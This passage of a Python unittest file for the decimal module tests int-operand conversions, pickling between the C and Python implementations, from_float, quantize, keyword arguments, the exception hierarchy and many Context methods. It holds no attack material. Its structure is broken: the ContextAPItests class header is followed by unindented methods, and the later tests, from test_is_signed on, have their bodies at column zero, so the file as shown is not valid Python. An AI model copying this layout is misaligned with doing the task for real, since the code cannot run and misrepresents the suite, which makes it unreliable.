        ans = str(Decimal('1.50001').quantize(exp=Decimal('1e-3'), rounding=ROUND_UP, context=None))
        self.assertEqual(ans, '1.501')
        c.clear_flags()
        self.assertRaises(InvalidOperation, y.quantize, Decimal('1e-10'), rounding=ROUND_UP, context=None)
        self.assertTrue(c.flags[InvalidOperation])

    # localcontext(ctx=None) must copy the *current* context.
    with localcontext(Context()) as context:
        context.prec = 7
        context.Emax = 999
        context.Emin = -999
        with localcontext(ctx=None) as c:
            self.assertEqual(c.prec, 7)
            self.assertEqual(c.Emax, 999)
            self.assertEqual(c.Emin, -999)
def test_conversions_from_int(self):
    """Every method that takes a second Decimal operand must also accept a
    plain int in its place and give exactly the same result."""
    D = self.decimal.Decimal

    self.assertEqual(D(4).compare(3), D(4).compare(D(3)))
    self.assertEqual(D(4).compare_signal(3), D(4).compare_signal(D(3)))
    self.assertEqual(D(4).compare_total(3), D(4).compare_total(D(3)))
    self.assertEqual(D(4).compare_total_mag(3), D(4).compare_total_mag(D(3)))
    self.assertEqual(D(10101).logical_and(1001), D(10101).logical_and(D(1001)))
    self.assertEqual(D(10101).logical_or(1001), D(10101).logical_or(D(1001)))
    self.assertEqual(D(10101).logical_xor(1001), D(10101).logical_xor(D(1001)))
    self.assertEqual(D(567).max(123), D(567).max(D(123)))
    self.assertEqual(D(567).max_mag(123), D(567).max_mag(D(123)))
    self.assertEqual(D(567).min(123), D(567).min(D(123)))
    self.assertEqual(D(567).min_mag(123), D(567).min_mag(D(123)))
    self.assertEqual(D(567).next_toward(123), D(567).next_toward(D(123)))
    self.assertEqual(D(1234).quantize(100), D(1234).quantize(D(100)))
    self.assertEqual(D(768).remainder_near(1234), D(768).remainder_near(D(1234)))
    self.assertEqual(D(123).rotate(1), D(123).rotate(D(1)))
    self.assertEqual(D(1234).same_quantum(1000), D(1234).same_quantum(D(1000)))
    self.assertEqual(D('9.123').scaleb(-100), D('9.123').scaleb(D(-100)))
    self.assertEqual(D(456).shift(-1), D(456).shift(D(-1)))

    # fma: the second and third operands may independently be ints.
    self.assertEqual(D(-12).fma(D(45), 67), D(-12).fma(D(45), D(67)))
    self.assertEqual(D(-12).fma(45, 67), D(-12).fma(D(45), D(67)))
    self.assertEqual(D(-12).fma(45, D(67)), D(-12).fma(D(45), D(67)))
class CUsabilityTest(UsabilityTest):
    # Run UsabilityTest against the C implementation.
    decimal = C
class PyUsabilityTest(UsabilityTest):
    # Run UsabilityTest against the pure-Python implementation.
    decimal = P
class PythonAPItests(unittest.TestCase):
    # Implementation-independent tests of the Python-level API surface:
    # ABC registration, pickling, int()/trunc() conversion, from_float,
    # quantize, the complex protocol, keyword arguments and the exception
    # hierarchy.  Subclasses supply `decimal` (C or pure-Python module).

    def test_abc(self):
        # Decimal is registered as a numbers.Number but deliberately not
        # as a numbers.Real.
        Decimal = self.decimal.Decimal

        self.assertTrue(issubclass(Decimal, numbers.Number))
        self.assertFalse(issubclass(Decimal, numbers.Real))
        self.assertIsInstance(Decimal(0), numbers.Number)
        self.assertNotIsInstance(Decimal(0), numbers.Real)

    def test_pickle(self):
        # Decimals must round-trip through pickle under every protocol,
        # and pickles must be interchangeable between the C and Python
        # implementations (the dump from one loads under the other).
        for proto in range(pickle.HIGHEST_PROTOCOL + 1):
            Decimal = self.decimal.Decimal

            savedecimal = sys.modules['decimal']

            # Round trip
            sys.modules['decimal'] = self.decimal
            d = Decimal('-3.141590000')
            p = pickle.dumps(d, proto)
            e = pickle.loads(p)
            self.assertEqual(d, e)

            if C:
                # Test interchangeability
                x = C.Decimal('-3.123e81723')
                y = P.Decimal('-3.123e81723')

                sys.modules['decimal'] = C
                sx = pickle.dumps(x, proto)
                sys.modules['decimal'] = P
                r = pickle.loads(sx)
                self.assertIsInstance(r, P.Decimal)
                self.assertEqual(r, y)

                sys.modules['decimal'] = P
                sy = pickle.dumps(y, proto)
                sys.modules['decimal'] = C
                r = pickle.loads(sy)
                self.assertIsInstance(r, C.Decimal)
                self.assertEqual(r, x)

                # Same interchangeability for as_tuple() results.
                x = C.Decimal('-3.123e81723').as_tuple()
                y = P.Decimal('-3.123e81723').as_tuple()

                sys.modules['decimal'] = C
                sx = pickle.dumps(x, proto)
                sys.modules['decimal'] = P
                r = pickle.loads(sx)
                self.assertIsInstance(r, P.DecimalTuple)
                self.assertEqual(r, y)

                sys.modules['decimal'] = P
                sy = pickle.dumps(y, proto)
                sys.modules['decimal'] = C
                r = pickle.loads(sy)
                self.assertIsInstance(r, C.DecimalTuple)
                self.assertEqual(r, x)

            # Restore the genuine decimal module.
            sys.modules['decimal'] = savedecimal

    def test_int(self):
        Decimal = self.decimal.Decimal

        for x in range(-250, 250):
            s = '%0.2f' % (x / 100.0)
            # should work the same as for floats
            self.assertEqual(int(Decimal(s)), int(float(s)))
            # should work the same as to_integral in the ROUND_DOWN mode
            d = Decimal(s)
            r = d.to_integral(ROUND_DOWN)
            self.assertEqual(Decimal(int(d)), r)

        # NaNs and infinities cannot convert to int.
        self.assertRaises(ValueError, int, Decimal('-nan'))
        self.assertRaises(ValueError, int, Decimal('snan'))
        self.assertRaises(OverflowError, int, Decimal('inf'))
        self.assertRaises(OverflowError, int, Decimal('-inf'))

    def test_trunc(self):
        Decimal = self.decimal.Decimal

        for x in range(-250, 250):
            s = '%0.2f' % (x / 100.0)
            # should work the same as for floats
            self.assertEqual(int(Decimal(s)), int(float(s)))
            # should work the same as to_integral in the ROUND_DOWN mode
            d = Decimal(s)
            r = d.to_integral(ROUND_DOWN)
            self.assertEqual(Decimal(math.trunc(d)), r)

    def test_from_float(self):
        # from_float must convert exactly, honour subclasses (including
        # their __init__), accept ints, and propagate nan/inf.
        Decimal = self.decimal.Decimal

        class MyDecimal(Decimal):
            def __init__(self, _):
                self.x = 'y'

        self.assertTrue(issubclass(MyDecimal, Decimal))

        r = MyDecimal.from_float(0.1)
        self.assertEqual(type(r), MyDecimal)
        # exact binary value of the double closest to 0.1
        self.assertEqual(str(r),
                '0.1000000000000000055511151231257827021181583404541015625')
        self.assertEqual(r.x, 'y')

        bigint = 12345678901234567890123456789
        self.assertEqual(MyDecimal.from_float(bigint), MyDecimal(bigint))
        self.assertTrue(MyDecimal.from_float(float('nan')).is_qnan())
        self.assertTrue(MyDecimal.from_float(float('inf')).is_infinite())
        self.assertTrue(MyDecimal.from_float(float('-inf')).is_infinite())
        self.assertEqual(str(MyDecimal.from_float(float('nan'))),
                         str(Decimal('NaN')))
        self.assertEqual(str(MyDecimal.from_float(float('inf'))),
                         str(Decimal('Infinity')))
        self.assertEqual(str(MyDecimal.from_float(float('-inf'))),
                         str(Decimal('-Infinity')))
        self.assertRaises(TypeError, MyDecimal.from_float, 'abc')
        for i in range(200):
            x = random.expovariate(0.01) * (random.random() * 2.0 - 1.0)
            self.assertEqual(x, float(MyDecimal.from_float(x))) # roundtrip

    def test_create_decimal_from_float(self):
        # Context.create_decimal_from_float rounds per the context
        # (unlike Decimal.from_float, which is exact) and signals Inexact
        # when trapped.
        Decimal = self.decimal.Decimal
        Context = self.decimal.Context
        Inexact = self.decimal.Inexact

        context = Context(prec=5, rounding=ROUND_DOWN)
        self.assertEqual(
            context.create_decimal_from_float(math.pi),
            Decimal('3.1415')
        )
        context = Context(prec=5, rounding=ROUND_UP)
        self.assertEqual(
            context.create_decimal_from_float(math.pi),
            Decimal('3.1416')
        )
        context = Context(prec=5, traps=[Inexact])
        self.assertRaises(
            Inexact,
            context.create_decimal_from_float,
            math.pi
        )
        # Sign of a negative zero and exact small values are preserved.
        self.assertEqual(repr(context.create_decimal_from_float(-0.0)),
                         "Decimal('-0')")
        self.assertEqual(repr(context.create_decimal_from_float(1.0)),
                         "Decimal('1')")
        self.assertEqual(repr(context.create_decimal_from_float(10)),
                         "Decimal('10')")

    def test_quantize(self):
        Decimal = self.decimal.Decimal
        Context = self.decimal.Context
        InvalidOperation = self.decimal.InvalidOperation

        c = Context(Emax=99999, Emin=-99999)
        self.assertEqual(
            Decimal('7.335').quantize(Decimal('.01')),
            Decimal('7.34')
        )
        self.assertEqual(
            Decimal('7.335').quantize(Decimal('.01'), rounding=ROUND_DOWN),
            Decimal('7.33')
        )
        # Target exponent outside the context's range is invalid.
        self.assertRaises(
            InvalidOperation,
            Decimal("10e99999").quantize, Decimal('1e100000'), context=c
        )

        c = Context()
        d = Decimal("0.871831e800")
        x = d.quantize(context=c, exp=Decimal("1e797"), rounding=ROUND_DOWN)
        self.assertEqual(x, Decimal('8.71E+799'))

    def test_complex(self):
        # Decimal supports the complex-number protocol: real/imag/conjugate
        # are read-only and __complex__ matches float conversion.
        Decimal = self.decimal.Decimal

        x = Decimal("9.8182731e181273")
        self.assertEqual(x.real, x)
        self.assertEqual(x.imag, 0)
        self.assertEqual(x.conjugate(), x)

        x = Decimal("1")
        self.assertEqual(complex(x), complex(float(1)))

        self.assertRaises(AttributeError, setattr, x, 'real', 100)
        self.assertRaises(AttributeError, setattr, x, 'imag', 100)
        self.assertRaises(AttributeError, setattr, x, 'conjugate', 100)
        self.assertRaises(AttributeError, setattr, x, '__complex__', 100)

    def test_named_parameters(self):
        # All context/rounding arguments must be usable as keywords; a
        # keyword context (xc) must collect the signals instead of the
        # active context (c).
        D = self.decimal.Decimal
        Context = self.decimal.Context
        localcontext = self.decimal.localcontext
        InvalidOperation = self.decimal.InvalidOperation
        Overflow = self.decimal.Overflow

        xc = Context()
        xc.prec = 1
        xc.Emax = 1
        xc.Emin = -1

        with localcontext() as c:
            c.clear_flags()

            self.assertEqual(D(9, xc), 9)
            self.assertEqual(D(9, context=xc), 9)
            self.assertEqual(D(context=xc, value=9), 9)
            self.assertEqual(D(context=xc), 0)
            xc.clear_flags()
            self.assertRaises(InvalidOperation, D, "xyz", context=xc)
            self.assertTrue(xc.flags[InvalidOperation])
            self.assertFalse(c.flags[InvalidOperation])

            xc.clear_flags()
            self.assertEqual(D(2).exp(context=xc), 7)
            self.assertRaises(Overflow, D(8).exp, context=xc)
            self.assertTrue(xc.flags[Overflow])
            self.assertFalse(c.flags[Overflow])

            xc.clear_flags()
            self.assertEqual(D(2).ln(context=xc), D('0.7'))
            self.assertRaises(InvalidOperation, D(-1).ln, context=xc)
            self.assertTrue(xc.flags[InvalidOperation])
            self.assertFalse(c.flags[InvalidOperation])

            self.assertEqual(D(0).log10(context=xc), D('-inf'))
            self.assertEqual(D(-1).next_minus(context=xc), -2)
            self.assertEqual(D(-1).next_plus(context=xc), D('-0.9'))
            self.assertEqual(D("9.73").normalize(context=xc), D('1E+1'))
            self.assertEqual(D("9999").to_integral(context=xc), 9999)
            self.assertEqual(D("-2000").to_integral_exact(context=xc), -2000)
            self.assertEqual(D("123").to_integral_value(context=xc), 123)
            self.assertEqual(D("0.0625").sqrt(context=xc), D('0.2'))

            self.assertEqual(D("0.0625").compare(context=xc, other=3), -1)
            xc.clear_flags()
            self.assertRaises(InvalidOperation,
                              D("0").compare_signal, D('nan'), context=xc)
            self.assertTrue(xc.flags[InvalidOperation])
            self.assertFalse(c.flags[InvalidOperation])
            self.assertEqual(D("0.01").max(D('0.0101'), context=xc), D('0.0'))
            # NOTE(review): duplicate of the previous assertion (kept as-is).
            self.assertEqual(D("0.01").max(D('0.0101'), context=xc), D('0.0'))
            self.assertEqual(D("0.2").max_mag(D('-0.3'), context=xc),
                             D('-0.3'))
            self.assertEqual(D("0.02").min(D('-0.03'), context=xc), D('-0.0'))
            self.assertEqual(D("0.02").min_mag(D('-0.03'), context=xc),
                             D('0.0'))
            self.assertEqual(D("0.2").next_toward(D('-1'), context=xc), D('0.1'))
            xc.clear_flags()
            self.assertRaises(InvalidOperation,
                              D("0.2").quantize, D('1e10'), context=xc)
            self.assertTrue(xc.flags[InvalidOperation])
            self.assertFalse(c.flags[InvalidOperation])
            self.assertEqual(D("9.99").remainder_near(D('1.5'), context=xc),
                             D('-0.5'))

            self.assertEqual(D("9.9").fma(third=D('0.9'), context=xc, other=7),
                             D('7E+1'))

            # Context-free predicates must reject a context keyword.
            self.assertRaises(TypeError, D(1).is_canonical, context=xc)
            self.assertRaises(TypeError, D(1).is_finite, context=xc)
            self.assertRaises(TypeError, D(1).is_infinite, context=xc)
            self.assertRaises(TypeError, D(1).is_nan, context=xc)
            self.assertRaises(TypeError, D(1).is_qnan, context=xc)
            self.assertRaises(TypeError, D(1).is_snan, context=xc)
            self.assertRaises(TypeError, D(1).is_signed, context=xc)
            self.assertRaises(TypeError, D(1).is_zero, context=xc)

            self.assertFalse(D("0.01").is_normal(context=xc))
            self.assertTrue(D("0.01").is_subnormal(context=xc))

            self.assertRaises(TypeError, D(1).adjusted, context=xc)
            self.assertRaises(TypeError, D(1).conjugate, context=xc)
            self.assertRaises(TypeError, D(1).radix, context=xc)

            self.assertEqual(D(-111).logb(context=xc), 2)
            self.assertEqual(D(0).logical_invert(context=xc), 1)
            self.assertEqual(D('0.01').number_class(context=xc), '+Subnormal')
            self.assertEqual(D('0.21').to_eng_string(context=xc), '0.21')

            self.assertEqual(D('11').logical_and(D('10'), context=xc), 0)
            self.assertEqual(D('11').logical_or(D('10'), context=xc), 1)
            self.assertEqual(D('01').logical_xor(D('10'), context=xc), 1)
            self.assertEqual(D('23').rotate(1, context=xc), 3)
            # NOTE(review): duplicate of the previous assertion (kept as-is).
            self.assertEqual(D('23').rotate(1, context=xc), 3)
            xc.clear_flags()
            self.assertRaises(Overflow,
                              D('23').scaleb, 1, context=xc)
            self.assertTrue(xc.flags[Overflow])
            self.assertFalse(c.flags[Overflow])
            self.assertEqual(D('23').shift(-1, context=xc), 0)

            self.assertRaises(TypeError, D.from_float, 1.1, context=xc)
            self.assertRaises(TypeError, D(0).as_tuple, context=xc)

            self.assertEqual(D(1).canonical(), 1)
            self.assertRaises(TypeError, D("-1").copy_abs, context=xc)
            self.assertRaises(TypeError, D("-1").copy_negate, context=xc)
            self.assertRaises(TypeError, D(1).canonical, context="x")
            self.assertRaises(TypeError, D(1).canonical, xyz="x")

    def test_exception_hierarchy(self):
        # Verify the documented signal/exception class hierarchy.
        decimal = self.decimal
        DecimalException = decimal.DecimalException
        InvalidOperation = decimal.InvalidOperation
        FloatOperation = decimal.FloatOperation
        DivisionByZero = decimal.DivisionByZero
        Overflow = decimal.Overflow
        Underflow = decimal.Underflow
        Subnormal = decimal.Subnormal
        Inexact = decimal.Inexact
        Rounded = decimal.Rounded
        Clamped = decimal.Clamped

        self.assertTrue(issubclass(DecimalException, ArithmeticError))

        self.assertTrue(issubclass(InvalidOperation, DecimalException))
        self.assertTrue(issubclass(FloatOperation, DecimalException))
        self.assertTrue(issubclass(FloatOperation, TypeError))
        self.assertTrue(issubclass(DivisionByZero, DecimalException))
        self.assertTrue(issubclass(DivisionByZero, ZeroDivisionError))
        self.assertTrue(issubclass(Overflow, Rounded))
        self.assertTrue(issubclass(Overflow, Inexact))
        self.assertTrue(issubclass(Overflow, DecimalException))
        self.assertTrue(issubclass(Underflow, Inexact))
        self.assertTrue(issubclass(Underflow, Rounded))
        self.assertTrue(issubclass(Underflow, Subnormal))
        self.assertTrue(issubclass(Underflow, DecimalException))
        self.assertTrue(issubclass(Subnormal, DecimalException))
        self.assertTrue(issubclass(Inexact, DecimalException))
        self.assertTrue(issubclass(Rounded, DecimalException))
        self.assertTrue(issubclass(Clamped, DecimalException))

        self.assertTrue(issubclass(decimal.ConversionSyntax, InvalidOperation))
        self.assertTrue(issubclass(decimal.DivisionImpossible, InvalidOperation))
        self.assertTrue(issubclass(decimal.DivisionUndefined, InvalidOperation))
        self.assertTrue(issubclass(decimal.DivisionUndefined, ZeroDivisionError))
        self.assertTrue(issubclass(decimal.InvalidContext, InvalidOperation))
class CPythonAPItests(PythonAPItests):
    # Run PythonAPItests against the C implementation.
    decimal = C
class PyPythonAPItests(PythonAPItests):
    # Run PythonAPItests against the pure-Python implementation.
    decimal = P
class ContextAPItests(unittest.TestCase):
def test_none_args(self):
    # Context(None, None, ...) must produce exactly the same defaults
    # as Context() with no arguments.
    Context = self.decimal.Context
    InvalidOperation = self.decimal.InvalidOperation
    DivisionByZero = self.decimal.DivisionByZero
    Overflow = self.decimal.Overflow

    c1 = Context()
    c2 = Context(prec=None, rounding=None, Emax=None, Emin=None,
                 capitals=None, clamp=None, flags=None, traps=None)
    for c in [c1, c2]:
        self.assertEqual(c.prec, 28)
        self.assertEqual(c.rounding, ROUND_HALF_EVEN)
        self.assertEqual(c.Emax, 999999)
        self.assertEqual(c.Emin, -999999)
        self.assertEqual(c.capitals, 1)
        self.assertEqual(c.clamp, 0)
        assert_signals(self, c, 'flags', [])
        assert_signals(self, c, 'traps', [InvalidOperation, DivisionByZero,
                                          Overflow])
@cpython_only
@requires_legacy_unicode_capi
@warnings_helper.ignore_warnings(category=DeprecationWarning)
def test_from_legacy_strings(self):
    # Legacy (non-canonical) unicode strings are accepted for valid
    # rounding-mode names but rejected when empty or containing NUL.
    import _testcapi
    c = self.decimal.Context()

    for rnd in RoundingModes:
        c.rounding = _testcapi.unicode_legacy_string(rnd)
        self.assertEqual(c.rounding, rnd)

    s = _testcapi.unicode_legacy_string('')
    self.assertRaises(TypeError, setattr, c, 'rounding', s)

    s = _testcapi.unicode_legacy_string('ROUND_\x00UP')
    self.assertRaises(TypeError, setattr, c, 'rounding', s)
def test_pickle(self):
    # Contexts must round-trip through pickle under every protocol, and
    # context pickles produced by one implementation must load under the
    # other with all attributes (including flags/traps sets) preserved.
    for proto in range(pickle.HIGHEST_PROTOCOL + 1):
        Context = self.decimal.Context

        savedecimal = sys.modules['decimal']

        # Round trip
        sys.modules['decimal'] = self.decimal
        c = Context()
        e = pickle.loads(pickle.dumps(c, proto))

        self.assertEqual(c.prec, e.prec)
        self.assertEqual(c.Emin, e.Emin)
        self.assertEqual(c.Emax, e.Emax)
        self.assertEqual(c.rounding, e.rounding)
        self.assertEqual(c.capitals, e.capitals)
        self.assertEqual(c.clamp, e.clamp)
        self.assertEqual(c.flags, e.flags)
        self.assertEqual(c.traps, e.traps)

        # Test interchangeability
        combinations = [(C, P), (P, C)] if C else [(P, P)]
        for dumper, loader in combinations:
            for ri, _ in enumerate(RoundingModes):
                for fi, _ in enumerate(OrderedSignals[dumper]):
                    for ti, _ in enumerate(OrderedSignals[dumper]):
                        prec = random.randrange(1, 100)
                        emin = random.randrange(-100, 0)
                        emax = random.randrange(1, 100)
                        caps = random.randrange(2)
                        clamp = random.randrange(2)

                        # One module dumps
                        sys.modules['decimal'] = dumper
                        c = dumper.Context(
                            prec=prec, Emin=emin, Emax=emax,
                            rounding=RoundingModes[ri],
                            capitals=caps, clamp=clamp,
                            flags=OrderedSignals[dumper][:fi],
                            traps=OrderedSignals[dumper][:ti]
                        )
                        s = pickle.dumps(c, proto)

                        # The other module loads
                        sys.modules['decimal'] = loader
                        d = pickle.loads(s)
                        self.assertIsInstance(d, loader.Context)

                        self.assertEqual(d.prec, prec)
                        self.assertEqual(d.Emin, emin)
                        self.assertEqual(d.Emax, emax)
                        self.assertEqual(d.rounding, RoundingModes[ri])
                        self.assertEqual(d.capitals, caps)
                        self.assertEqual(d.clamp, clamp)
                        assert_signals(self, d, 'flags', OrderedSignals[loader][:fi])
                        assert_signals(self, d, 'traps', OrderedSignals[loader][:ti])

        # Restore the genuine decimal module.
        sys.modules['decimal'] = savedecimal
def test_equality_with_other_types(self):
    """Decimal equality must interoperate with heterogeneous containers."""
    Decimal = self.decimal.Decimal

    mixed_with_decimal = ['a', 1.0, Decimal(10), (1,2), {}]
    mixed_without_decimal = ['a', 1.0, (1,2), {}]
    self.assertIn(Decimal(10), mixed_with_decimal)
    self.assertNotIn(Decimal(10), mixed_without_decimal)
def test_copy(self):
    """Context.copy must be deep: a distinct context object with distinct
    (but equal) flags and traps mappings."""
    Decimal = self.decimal.Decimal
    Context = self.decimal.Context

    original = Context()
    clone = original.copy()
    # distinct objects all the way down
    self.assertNotEqual(id(original), id(clone))
    self.assertNotEqual(id(original.flags), id(clone.flags))
    self.assertNotEqual(id(original.traps), id(clone.traps))
    # ... but with identical contents
    self.assertEqual(set(original.flags.keys()), set(clone.flags.keys()))
    self.assertEqual(original.flags, clone.flags)
def test__clamp(self):
    # In Python 3.2, the private attribute `_clamp` was made
    # public (issue 8540), with the old `_clamp` becoming a
    # property wrapping `clamp`. For the duration of Python 3.2
    # only, the attribute should be gettable/settable via both
    # `clamp` and `_clamp`; in Python 3.3, `_clamp` should be
    # removed.
    Context = self.decimal.Context
    c = Context()
    # _clamp is gone: accessing it must raise AttributeError.
    self.assertRaises(AttributeError, getattr, c, '_clamp')
def test_abs(self):
    """Context.abs accepts an int operand; a str operand raises TypeError."""
    Decimal = self.decimal.Decimal
    ctx = self.decimal.Context()

    expected = ctx.abs(Decimal(-1))
    self.assertEqual(ctx.abs(-1), expected)
    self.assertRaises(TypeError, ctx.abs, '-1')
def test_add(self):
    """Context.add accepts ints for either operand; str operands raise."""
    Decimal = self.decimal.Decimal
    ctx = self.decimal.Context()

    expected = ctx.add(Decimal(1), Decimal(1))
    for lhs, rhs in ((1, 1), (Decimal(1), 1), (1, Decimal(1))):
        self.assertEqual(ctx.add(lhs, rhs), expected)
    self.assertRaises(TypeError, ctx.add, '1', 1)
    self.assertRaises(TypeError, ctx.add, 1, '1')
def test_compare(self):
    """Context.compare accepts ints for either operand; str operands raise."""
    Decimal = self.decimal.Decimal
    ctx = self.decimal.Context()

    expected = ctx.compare(Decimal(1), Decimal(1))
    for lhs, rhs in ((1, 1), (Decimal(1), 1), (1, Decimal(1))):
        self.assertEqual(ctx.compare(lhs, rhs), expected)
    self.assertRaises(TypeError, ctx.compare, '1', 1)
    self.assertRaises(TypeError, ctx.compare, 1, '1')
def test_compare_signal(self):
    """Context.compare_signal accepts ints for either operand; str raises."""
    Decimal = self.decimal.Decimal
    ctx = self.decimal.Context()

    expected = ctx.compare_signal(Decimal(1), Decimal(1))
    for lhs, rhs in ((1, 1), (Decimal(1), 1), (1, Decimal(1))):
        self.assertEqual(ctx.compare_signal(lhs, rhs), expected)
    self.assertRaises(TypeError, ctx.compare_signal, '1', 1)
    self.assertRaises(TypeError, ctx.compare_signal, 1, '1')
def test_compare_total(self):
    """Context.compare_total accepts ints for either operand; str raises."""
    Decimal = self.decimal.Decimal
    ctx = self.decimal.Context()

    expected = ctx.compare_total(Decimal(1), Decimal(1))
    for lhs, rhs in ((1, 1), (Decimal(1), 1), (1, Decimal(1))):
        self.assertEqual(ctx.compare_total(lhs, rhs), expected)
    self.assertRaises(TypeError, ctx.compare_total, '1', 1)
    self.assertRaises(TypeError, ctx.compare_total, 1, '1')
def test_compare_total_mag(self):
    """Context.compare_total_mag accepts ints for either operand; str raises."""
    Decimal = self.decimal.Decimal
    ctx = self.decimal.Context()

    expected = ctx.compare_total_mag(Decimal(1), Decimal(1))
    for lhs, rhs in ((1, 1), (Decimal(1), 1), (1, Decimal(1))):
        self.assertEqual(ctx.compare_total_mag(lhs, rhs), expected)
    self.assertRaises(TypeError, ctx.compare_total_mag, '1', 1)
    self.assertRaises(TypeError, ctx.compare_total_mag, 1, '1')
def test_copy_abs(self):
    """Context.copy_abs accepts an int operand; a str operand raises."""
    Decimal = self.decimal.Decimal
    ctx = self.decimal.Context()

    expected = ctx.copy_abs(Decimal(-1))
    self.assertEqual(ctx.copy_abs(-1), expected)
    self.assertRaises(TypeError, ctx.copy_abs, '-1')
def test_copy_decimal(self):
    """Context.copy_decimal accepts an int operand; a str operand raises."""
    Decimal = self.decimal.Decimal
    ctx = self.decimal.Context()

    expected = ctx.copy_decimal(Decimal(-1))
    self.assertEqual(ctx.copy_decimal(-1), expected)
    self.assertRaises(TypeError, ctx.copy_decimal, '-1')
def test_copy_negate(self):
    """Context.copy_negate accepts an int operand; a str operand raises."""
    Decimal = self.decimal.Decimal
    ctx = self.decimal.Context()

    expected = ctx.copy_negate(Decimal(-1))
    self.assertEqual(ctx.copy_negate(-1), expected)
    self.assertRaises(TypeError, ctx.copy_negate, '-1')
def test_copy_sign(self):
    """Context.copy_sign accepts ints for either operand; str operands raise."""
    Decimal = self.decimal.Decimal
    ctx = self.decimal.Context()

    expected = ctx.copy_sign(Decimal(1), Decimal(-2))
    for lhs, rhs in ((1, -2), (Decimal(1), -2), (1, Decimal(-2))):
        self.assertEqual(ctx.copy_sign(lhs, rhs), expected)
    self.assertRaises(TypeError, ctx.copy_sign, '1', -2)
    self.assertRaises(TypeError, ctx.copy_sign, 1, '-2')
def test_divide(self):
    """Context.divide accepts ints for either operand; str operands raise."""
    Decimal = self.decimal.Decimal
    ctx = self.decimal.Context()

    expected = ctx.divide(Decimal(1), Decimal(2))
    for lhs, rhs in ((1, 2), (Decimal(1), 2), (1, Decimal(2))):
        self.assertEqual(ctx.divide(lhs, rhs), expected)
    self.assertRaises(TypeError, ctx.divide, '1', 2)
    self.assertRaises(TypeError, ctx.divide, 1, '2')
def test_divide_int(self):
    """Context.divide_int accepts ints for either operand; str operands raise."""
    Decimal = self.decimal.Decimal
    ctx = self.decimal.Context()

    expected = ctx.divide_int(Decimal(1), Decimal(2))
    for lhs, rhs in ((1, 2), (Decimal(1), 2), (1, Decimal(2))):
        self.assertEqual(ctx.divide_int(lhs, rhs), expected)
    self.assertRaises(TypeError, ctx.divide_int, '1', 2)
    self.assertRaises(TypeError, ctx.divide_int, 1, '2')
def test_divmod(self):
    """Context.divmod accepts ints for either operand; str operands raise."""
    Decimal = self.decimal.Decimal
    ctx = self.decimal.Context()

    expected = ctx.divmod(Decimal(1), Decimal(2))
    for lhs, rhs in ((1, 2), (Decimal(1), 2), (1, Decimal(2))):
        self.assertEqual(ctx.divmod(lhs, rhs), expected)
    self.assertRaises(TypeError, ctx.divmod, '1', 2)
    self.assertRaises(TypeError, ctx.divmod, 1, '2')
def test_exp(self):
    """Context.exp accepts an int operand; a str operand raises TypeError."""
    Decimal = self.decimal.Decimal
    ctx = self.decimal.Context()

    expected = ctx.exp(Decimal(10))
    self.assertEqual(ctx.exp(10), expected)
    self.assertRaises(TypeError, ctx.exp, '10')
def test_fma(self):
    # Context.fma accepts ints for any of its three operands; a
    # non-numeric third operand must raise TypeError even when an
    # earlier operand would already signal (issue 12079).
    Decimal = self.decimal.Decimal
    Context = self.decimal.Context

    c = Context()
    d = c.fma(Decimal(2), Decimal(3), Decimal(4))
    self.assertEqual(c.fma(2, 3, 4), d)
    self.assertEqual(c.fma(Decimal(2), 3, 4), d)
    self.assertEqual(c.fma(2, Decimal(3), 4), d)
    self.assertEqual(c.fma(2, 3, Decimal(4)), d)
    self.assertEqual(c.fma(Decimal(2), Decimal(3), 4), d)
    self.assertRaises(TypeError, c.fma, '2', 3, 4)
    self.assertRaises(TypeError, c.fma, 2, '3', 4)
    self.assertRaises(TypeError, c.fma, 2, 3, '4')

    # Issue 12079 for Context.fma ...
    self.assertRaises(TypeError, c.fma,
                      Decimal('Infinity'), Decimal(0), "not a decimal")
    self.assertRaises(TypeError, c.fma,
                      Decimal(1), Decimal('snan'), 1.222)
    # ... and for Decimal.fma.
    self.assertRaises(TypeError, Decimal('Infinity').fma,
                      Decimal(0), "not a decimal")
    self.assertRaises(TypeError, Decimal(1).fma,
                      Decimal('snan'), 1.222)
def test_is_finite(self):
    """Context.is_finite accepts an int operand; a str operand raises."""
    Decimal = self.decimal.Decimal
    ctx = self.decimal.Context()

    expected = ctx.is_finite(Decimal(10))
    self.assertEqual(ctx.is_finite(10), expected)
    self.assertRaises(TypeError, ctx.is_finite, '10')
def test_is_infinite(self):
    """Context.is_infinite accepts an int operand; a str operand raises."""
    Decimal = self.decimal.Decimal
    ctx = self.decimal.Context()

    expected = ctx.is_infinite(Decimal(10))
    self.assertEqual(ctx.is_infinite(10), expected)
    self.assertRaises(TypeError, ctx.is_infinite, '10')
def test_is_nan(self):
    """Context.is_nan accepts an int operand; a str operand raises."""
    Decimal = self.decimal.Decimal
    ctx = self.decimal.Context()

    expected = ctx.is_nan(Decimal(10))
    self.assertEqual(ctx.is_nan(10), expected)
    self.assertRaises(TypeError, ctx.is_nan, '10')
def test_is_normal(self):
    """Context.is_normal accepts an int operand; a str operand raises."""
    Decimal = self.decimal.Decimal
    ctx = self.decimal.Context()

    expected = ctx.is_normal(Decimal(10))
    self.assertEqual(ctx.is_normal(10), expected)
    self.assertRaises(TypeError, ctx.is_normal, '10')
def test_is_qnan(self):
    """Context.is_qnan accepts an int operand; a str operand raises."""
    Decimal = self.decimal.Decimal
    ctx = self.decimal.Context()

    expected = ctx.is_qnan(Decimal(10))
    self.assertEqual(ctx.is_qnan(10), expected)
    self.assertRaises(TypeError, ctx.is_qnan, '10')
def test_is_signed(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_signed(Decimal(10))
self.assertEqual(c.is_signed(10), d)
self.assertRaises(TypeError, c.is_signed, '10')
def test_is_snan(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_snan(Decimal(10))
self.assertEqual(c.is_snan(10), d)
self.assertRaises(TypeError, c.is_snan, '10')
def test_is_subnormal(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_subnormal(Decimal(10))
self.assertEqual(c.is_subnormal(10), d)
self.assertRaises(TypeError, c.is_subnormal, '10')
def test_is_zero(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_zero(Decimal(10))
self.assertEqual(c.is_zero(10), d)
self.assertRaises(TypeError, c.is_zero, '10')
def test_ln(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.ln(Decimal(10))
self.assertEqual(c.ln(10), d)
self.assertRaises(TypeError, c.ln, '10')
def test_log10(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
